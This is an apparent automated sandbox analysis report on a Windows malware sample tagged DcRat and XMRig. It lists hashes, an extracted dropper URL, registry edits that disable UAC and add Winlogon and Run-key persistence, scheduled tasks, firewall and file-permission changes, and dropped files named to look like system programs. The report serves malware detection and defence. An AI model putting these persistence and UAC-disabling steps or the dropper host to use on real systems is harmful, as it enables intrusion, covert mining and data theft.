dcrat | b8afae5969d3fc98aee33c071cf5fe1b326d96bb7516e98096261f6570edcb79

Analysis

max time kernel
163s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2022 06:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

34.0MB
MD5

aa23503fe31986791d574c378ecc9d96
SHA1

546e9e966cb4f65833f2e7da7707d02268b69b41
SHA256

b8afae5969d3fc98aee33c071cf5fe1b326d96bb7516e98096261f6570edcb79
SHA512

3b3a8ea54f7756233bc3e3744f6ed10e64da660fedd58e514fa1e5893c533125caffba692443dac9cf3925ecd3ea0030ab18a00ed7f20d8d16bfea1eaaca2eec
SSDEEP

786432:/8N4XTCyZBe0CIctk/p4EJSRuJ30H9MReKJXsOsV7pmHzo9K://XTDZB/y1899sZMToc

Score

10^/10

dcrat xmrig discovery evasion exploit infostealer miner persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.81.224.130/any.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

savesdhcpcommon.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\windows\\migration\\Idle.exe\""	savesdhcpcommon.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	3572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	3572	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2376	3572	schtasks.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

savesdhcpcommon.exeIdle.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	savesdhcpcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	savesdhcpcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	savesdhcpcommon.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Windows\Migration\stil.exe	dcrat
\??\c:\windows\migration\stil.exe	dcrat
C:\Windows\Migration\savesdhcpcommon.exe	dcrat
C:\windows\migration\savesdhcpcommon.exe	dcrat
behavioral2/memory/3620-229-0x0000000000E10000-0x0000000000F24000-memory.dmp	dcrat
C:\Windows\Migration\Idle.exe	dcrat
C:\windows\migration\Idle.exe	dcrat

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\Tasks\ApplicationsFrameHost.exe	xmrig
C:\Windows\Tasks\ApplicationsFrameHost.exe	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

85 3668 powershell.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050

flow	pid	process
85	3668	powershell.exe

Executes dropped EXE 22 IoCs

Processes:

1.exedc.exeany.execudo.exestil.exesavesdhcpcommon.exemigrate.exeIdle.exeWmiic.exeCudo Miner.exeWmiic.exeWmiic.exeCudo Miner Core.exeIntelConfigService.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exe~Ma4650.execudo-gpu-info.execurl.execurl.exe

pid	process
2692	1.exe
3048	dc.exe
2924	any.exe
1656	cudo.exe
1668	stil.exe
3620	savesdhcpcommon.exe
4288	migrate.exe
4448	Idle.exe
212	Wmiic.exe
4836	Cudo Miner.exe
1832	Wmiic.exe
924	Wmiic.exe
4504	Cudo Miner Core.exe
1268	IntelConfigService.exe
1596	Wrap.exe
1192	ApplicationsFrameHost.exe
1360	Superfetch.exe
4236	MSTask.exe
4440	~Ma4650.exe
2372	cudo-gpu-info.exe
1148	curl.exe
3052	curl.exe

Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

3404 netsh.exe
3524 netsh.exe

pid	process
3404	netsh.exe
3524	netsh.exe

Possible privilege escalation attempt 11 IoCs

exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
5104	takeown.exe
4424	icacls.exe
3884	icacls.exe
3048	icacls.exe
1144	icacls.exe
1780	icacls.exe
1640	icacls.exe
2320	icacls.exe
684	icacls.exe
4336	icacls.exe
640	icacls.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tmp.exedc.exeany.exestil.execudo.exeWScript.exesavesdhcpcommon.exemigrate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	dc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	any.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	stil.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cudo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	savesdhcpcommon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	migrate.exe

Loads dropped DLL 3 IoCs

Processes:

~Ma4650.exe

pid process

4440 ~Ma4650.exe
4440 ~Ma4650.exe
4440 ~Ma4650.exe

pid	process
4440	~Ma4650.exe
4440	~Ma4650.exe
4440	~Ma4650.exe

Modifies file permissions 1 TTPs 11 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4424	icacls.exe
684	icacls.exe
1144	icacls.exe
1780	icacls.exe
640	icacls.exe
1640	icacls.exe
5104	takeown.exe
3884	icacls.exe
3048	icacls.exe
4336	icacls.exe
2320	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

savesdhcpcommon.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\windows\\migration\\Idle.exe\""	savesdhcpcommon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\windows\\migration\\Idle.exe\""	savesdhcpcommon.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Idle.exesavesdhcpcommon.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	savesdhcpcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	savesdhcpcommon.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Windows\Tasks\IntelConfigService.exe	autoit_exe
C:\windows\tasks\IntelConfigService.exe	autoit_exe
C:\Windows\Tasks\Superfetch.exe	autoit_exe
C:\Windows\Tasks\Superfetch.exe	autoit_exe

Drops file in Program Files directory 64 IoCs

Processes:

cudo.exe

description	ioc	process
File created	C:\Program Files\Cudo Miner\.cudo_minerrc	cudo.exe
File created	C:\Program Files\Cudo Miner\components	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\icon.ico	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\phymem.inf	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\components	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\Cudo Miner.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\Uninstall.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\Updater.xml	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\bin\e55caae53f19b613.tar	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\amdvbflash.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\atillk64.sys	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashchs.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashdeu.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashfra.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashjpn.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashsve.dll	cudo.exe
File created	\??\c:\Program files\Cudo Miner\runtime\amdvbflash.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\atiadlxy_7_19_10_1348.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashesp.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\run.bat	cudo.exe
File created	C:\Program Files\Cudo Miner\bin\cudo-defender-exclusion.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashchs.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashcht.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashdeu.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashenu.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashenu.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashita.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashkor.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashkor.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashptb.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\phymem.sys	cudo.exe
File created	C:\Program Files\Cudo Miner\Cudo Miner Core.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\Cudo Miner.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\bin\cudo-gpu-info.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\atiadlxx_7_19_10_1348.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashfra.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\bin\cudo-win-tools.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\amdvbflashWin.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\atidgllk.sys	cudo.exe
File opened for modification	\??\c:\Program files\Cudo Miner	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\Updater.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashdef.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashdef.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ULPSCtrl.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\cudominercli.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\bin\cudo-win-tools.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashptb.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ULPSCtrl.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\cudominercli.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\bin\cudo-defender-exclusion.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\atiadlxy_7_19_10_1348.dll	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\.cudo_minerrc	cudo.exe
File created	C:\Program Files\Cudo Miner\Cudo Miner.xml	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\Cudo Miner.xml	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\phymem.inf	cudo.exe
File created	C:\Program Files\Cudo Miner\run.bat	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\amdvbflash.exe	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\atidgllk.sys	cudo.exe
File created	C:\Program Files\Cudo Miner\Uninstall.exe	cudo.exe
File created	\??\c:\Program files\Cudo Miner\bin\cudo-defender-exclusion.exe	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\runtime\ATIWinflashcht.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\runtime\ATIWinflashjpn.dll	cudo.exe
File created	C:\Program Files\Cudo Miner\__tmp_rar_sfx_access_check_240573359	cudo.exe

Drops file in Windows directory 42 IoCs

Processes:

dc.exestil.exemigrate.execmd.exepowershell.exesavesdhcpcommon.exeApplicationsFrameHost.exeIntelConfigService.execmd.exe

description	ioc	process
File created	C:\Windows\Migration\stil.exe	dc.exe
File created	C:\Windows\Migration\JSavDJfGkqsqiENdifm.bat	stil.exe
File opened for modification	C:\Windows\Tasks\MSTask.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\run.bat	migrate.exe
File created	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File opened for modification	C:\Windows\Migration\stil.bat	dc.exe
File created	C:\Windows\Tasks\__tmp_rar_sfx_access_check_240594796	migrate.exe
File created	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\config.json	migrate.exe
File created	C:\Windows\curl.exe	cmd.exe
File created	\??\c:\windows\migration\any.exe	powershell.exe
File opened for modification	C:\Windows\Migration\uolU0W2BGm0r9qjOq.vbe	stil.exe
File created	C:\windows\migration\Idle.exe	savesdhcpcommon.exe
File opened for modification	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\config.json	ApplicationsFrameHost.exe
File created	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File opened for modification	C:\Windows\Migration\U3nsXCQPB8MSTcQAVhWLtxfj6wb.bat	stil.exe
File created	C:\Windows\Migration\uolU0W2BGm0r9qjOq.vbe	stil.exe
File opened for modification	C:\windows\migration\Idle.exe	savesdhcpcommon.exe
File opened for modification	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File opened for modification	C:\Windows\curl.exe	cmd.exe
File opened for modification	C:\Windows\Migration\stil.exe	dc.exe
File created	C:\Windows\Migration\__tmp_rar_sfx_access_check_240575812	stil.exe
File opened for modification	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File created	C:\Windows\Tasks\Wrap.exe	migrate.exe
File created	C:\windows\migration\6ccacd8608530f	savesdhcpcommon.exe
File created	C:\Windows\Tasks\MSTask.exe	migrate.exe
File opened for modification	C:\Windows\Tasks	IntelConfigService.exe
File created	C:\Windows\Tasks\config.json	migrate.exe
File opened for modification	C:\Windows\curl.exe	cmd.exe
File created	C:\Windows\Migration\__tmp_rar_sfx_access_check_240573078	dc.exe
File opened for modification	C:\Windows\Migration\JSavDJfGkqsqiENdifm.bat	stil.exe
File created	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File created	C:\Windows\Tasks\run.bat	migrate.exe
File created	C:\Windows\Migration\stil.bat	dc.exe
File created	C:\Windows\Migration\U3nsXCQPB8MSTcQAVhWLtxfj6wb.bat	stil.exe
File created	C:\Windows\Migration\savesdhcpcommon.exe	stil.exe
File opened for modification	C:\Windows\Migration\savesdhcpcommon.exe	stil.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1284 sc.exe
3672 sc.exe
4896 sc.exe
5068 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1284	sc.exe
3672	sc.exe
4896	sc.exe
5068	sc.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Cudo Miner Core.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Cudo Miner Core.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Cudo Miner Core.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Cudo Miner Core.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Cudo Miner Core.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	Cudo Miner Core.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Cudo Miner Core.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4356 schtasks.exe
3436 schtasks.exe
2376 schtasks.exe

pid	process
4356	schtasks.exe
3436	schtasks.exe
2376	schtasks.exe

Delays execution with timeout.exe 11 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3176	timeout.exe
4844	timeout.exe
1016	timeout.exe
2372	timeout.exe
2212	timeout.exe
4764	timeout.exe
4652	timeout.exe
3352	timeout.exe
2564	timeout.exe
4764	timeout.exe
1808	timeout.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

228 tasklist.exe
4808 tasklist.exe
424 tasklist.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXEipconfig.exe

pid process

2888 NETSTAT.EXE
1592 ipconfig.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2888 taskkill.exe
1376 taskkill.exe

pid	process
228	tasklist.exe
4808	tasklist.exe
424	tasklist.exe

pid	process
2888	NETSTAT.EXE
1592	ipconfig.exe

pid	process
2888	taskkill.exe
1376	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

~Ma4650.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe

Modifies data under HKEY_USERS 21 IoCs

Processes:

~Ma4650.exeMSTask.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MSTask.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\MAIN	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MSTask.exe

Modifies registry class 1 IoCs

Processes:

stil.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings stil.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	stil.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exesavesdhcpcommon.exepowershell.exepowershell.exeIdle.exeCudo Miner.exepowershell.exeCudo Miner Core.exeIntelConfigService.exe

pid	process
4816	powershell.exe
4816	powershell.exe
1960	powershell.exe
1960	powershell.exe
1944	powershell.exe
1944	powershell.exe
1944	powershell.exe
3620	savesdhcpcommon.exe
1656	powershell.exe
1656	powershell.exe
3736	powershell.exe
3736	powershell.exe
1656	powershell.exe
3736	powershell.exe
4448	Idle.exe
4448	Idle.exe
4836	Cudo Miner.exe
4836	Cudo Miner.exe
3668	powershell.exe
3668	powershell.exe
4504	Cudo Miner Core.exe
4504	Cudo Miner Core.exe
3668	powershell.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe
1268	IntelConfigService.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

~Ma4650.exe

pid process

4440 ~Ma4650.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
4440	~Ma4650.exe

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetasklist.exesavesdhcpcommon.exepowershell.exepowershell.exeIdle.exeCudo Miner.exepowershell.exeApplicationsFrameHost.exeWMIC.exeWMIC.execmd.exe

description	pid	process
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeDebugPrivilege	228	tasklist.exe
Token: SeDebugPrivilege	3620	savesdhcpcommon.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	4448	Idle.exe
Token: SeDebugPrivilege	4836	Cudo Miner.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeLockMemoryPrivilege	1192	ApplicationsFrameHost.exe
Token: SeAssignPrimaryTokenPrivilege	3868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3868	WMIC.exe
Token: SeSecurityPrivilege	3868	WMIC.exe
Token: SeTakeOwnershipPrivilege	3868	WMIC.exe
Token: SeLoadDriverPrivilege	3868	WMIC.exe
Token: SeSystemtimePrivilege	3868	WMIC.exe
Token: SeBackupPrivilege	3868	WMIC.exe
Token: SeRestorePrivilege	3868	WMIC.exe
Token: SeShutdownPrivilege	3868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3868	WMIC.exe
Token: SeUndockPrivilege	3868	WMIC.exe
Token: SeManageVolumePrivilege	3868	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3868	WMIC.exe
Token: SeSecurityPrivilege	3868	WMIC.exe
Token: SeTakeOwnershipPrivilege	3868	WMIC.exe
Token: SeLoadDriverPrivilege	3868	WMIC.exe
Token: SeSystemtimePrivilege	3868	WMIC.exe
Token: SeBackupPrivilege	3868	WMIC.exe
Token: SeRestorePrivilege	3868	WMIC.exe
Token: SeShutdownPrivilege	3868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3868	WMIC.exe
Token: SeUndockPrivilege	3868	WMIC.exe
Token: SeManageVolumePrivilege	3868	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2276	WMIC.exe
Token: SeSecurityPrivilege	2276	WMIC.exe
Token: SeTakeOwnershipPrivilege	2276	WMIC.exe
Token: SeLoadDriverPrivilege	2276	WMIC.exe
Token: SeSystemtimePrivilege	2276	WMIC.exe
Token: SeBackupPrivilege	2276	WMIC.exe
Token: SeRestorePrivilege	2276	WMIC.exe
Token: SeShutdownPrivilege	2276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2276	WMIC.exe
Token: SeUndockPrivilege	2276	WMIC.exe
Token: SeManageVolumePrivilege	2276	WMIC.exe
